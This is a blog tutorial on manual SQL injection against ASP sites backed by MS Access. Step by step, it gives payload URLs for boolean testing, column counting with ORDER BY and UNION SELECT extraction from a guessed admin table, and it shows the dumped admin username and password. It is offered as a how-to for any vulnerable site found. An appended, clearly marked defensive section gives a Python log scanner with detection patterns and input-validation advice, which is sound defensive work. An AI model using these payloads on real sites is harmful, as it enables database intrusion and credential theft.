Hi readers! After a long gap I'm going to share an interesting & useful tutorial with you all. I will be demonstrating how to manually exploit MS Access websites vulnerable to SQL injection. So let's get started!
Things Required
- Vulnerable website
Step By Step Guide
- Let's assume we found a vulnerable website, xyz.com.
- Now our first job will be to confirm that the error is valid, because not every error means the site is vulnerable to SQL injection.
http://www.xyz.com/vuln.asp?code=266 and 1=1# -> This URL will load normally without any errors, as 1 is always equal to 1 (simple mathematics).
http://www.xyz.com/vuln.asp?code=266 and 1=2# -> This URL will not load normally, as 1 is not equal to 2.
So by observing this behaviour we can say that yes, the URL is a correct injection point. Let's now proceed with our next step.
- After we have validated that it's a valid injection point, let's find out the drives available on the target system.
Now notice the output! If the output is "Could not find file 'd:\.mdb'." then this means yes, there is a drive d:, and if the output is "'l:\.mdb' is not a valid path" then this means there is no drive l:. So to find all the drive names we will keep replacing "d" in the above query with a, b, c and so on.
- Our next step will be to find the number of columns. To find the number of columns we will use the following query - "order by x#"
- http://www.xyz.com/vuln.asp?code=266 order by 6# - No Error (Loads Normally)
- http://www.xyz.com/vuln.asp?code=266 order by 7# - No Error (Loads Normally)
- http://www.xyz.com/vuln.asp?code=266 order by 8# - No Error (Loads Normally)
- http://www.xyz.com/vuln.asp?code=266 order by 9# - Error! (Throws an Error)
So, as we have noticed, the page loads normally up to 8 and throws an error on 9, which means the number of columns is 8.
- After we have found the number of columns, our next task is to guess the table name. This is the most difficult part, because guessing the table name ain't easy! Here you can take the help of Google to find some of the standard table names. Anyway, in my case the table name was admin (Lucky eeh!).
Our next query will be - "and 1=2 union all select 1,2,3,4,5,6,7,8 from admin#"
- http://www.xyz.com/vuln.asp?code=266 and 1=2 union all select 1,2,3,4,5,6,7,8 from admin#
Executing the above query will throw out the vulnerable column numbers. As you can see in the above image, the vulnerable columns are 2, 4 & 3.
- Once we have got the vulnerable columns, it's time to guess the column names. As my table name is admin, guessing the column names is not a difficult task, as normally the columns for admin are id, username, password, email etc.
So now we will inject the column names into the vulnerable column numbers which we extracted in our previous step.
http://www.xyz.com/vuln.asp?code=266 and 1=2 union all select 1,id,username,password,5,6,7,8 from admin#
id - 1
username - 1775urp2
password - 8=Ogmlq"
- Finally, you are done: admin username & password extracted! Happy Learning!
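Seen from the defender's side, every step above leaves a recognisable request in the web server log. The following Python example is added here and is not part of the original tutorial: it flags the boolean test, the ORDER BY column counting and the UNION SELECT requests, plus any non-integer value in a parameter that should be numeric. The log lines, the simplified three-field log format and the `NUMERIC_PARAMS` set are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines (method, URL-encoded target, status); not real traffic.
SAMPLE_LOG = [
    "GET /vuln.asp?code=266 200",
    "GET /vuln.asp?code=266%20and%201=1%23 200",
    "GET /vuln.asp?code=266%20and%201=2%23 500",
    "GET /vuln.asp?code=266%20order%20by%208%23 200",
    "GET /vuln.asp?code=266%20order%20by%209%23 500",
    "GET /vuln.asp?code=266%20and%201=2%20union%20all%20select%201,2,3,4,5,6,7,8%20from%20admin%23 200",
    "GET /news.asp?title=order+by+phone 200",  # benign text that must not be flagged
]

# Probe shapes taken from the steps of the tutorial.
SIGNATURES = {
    "boolean-test": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "order-by-count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}

# Assumption: parameters the application expects to be plain integers.
NUMERIC_PARAMS = {"code"}

def classify(line):
    """Return (target, status, sorted findings) for one log line."""
    _method, target, status = line.split()
    findings = set()
    # parse_qsl URL-decodes each value, so %20 and %23 become ' ' and '#'.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.add("non-numeric:" + name)
        for label, rx in SIGNATURES.items():
            if rx.search(value):
                findings.add(label)
    return target, int(status), sorted(findings)

def scan(lines):
    """Return only the log lines with at least one finding."""
    return [r for r in map(classify, lines) if r[2]]

if __name__ == "__main__":
    for target, status, findings in scan(SAMPLE_LOG):
        print(status, ",".join(findings), target)
```

Because `code` is expected to be an integer, rejecting any non-integer value in the application before the query is built removes this injection point; the log check only shows who tried.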
Manual MSAccess SQL Injection Tutorial | Microsoft JET Database Engine error '80004005'
Reviewed by Rishal Dwivedi on 01:40